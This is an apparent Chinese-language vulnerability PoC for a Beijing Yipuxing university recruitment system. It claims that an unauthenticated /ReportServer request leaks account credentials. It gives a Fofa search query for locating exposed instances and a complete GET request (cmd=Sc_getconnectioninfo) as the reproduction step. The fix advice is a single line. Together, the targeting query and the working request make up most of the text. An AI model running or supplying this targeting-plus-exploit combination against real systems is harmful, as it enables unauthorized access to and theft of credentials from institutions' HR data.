0x01 产品描述:
**易普行科技的高校招聘系统** 是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑。
0x02 漏洞描述:
易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:
Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"
0x04 漏洞复现:
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
0x05 修复建议:
厂商已发布补丁 请即时修复。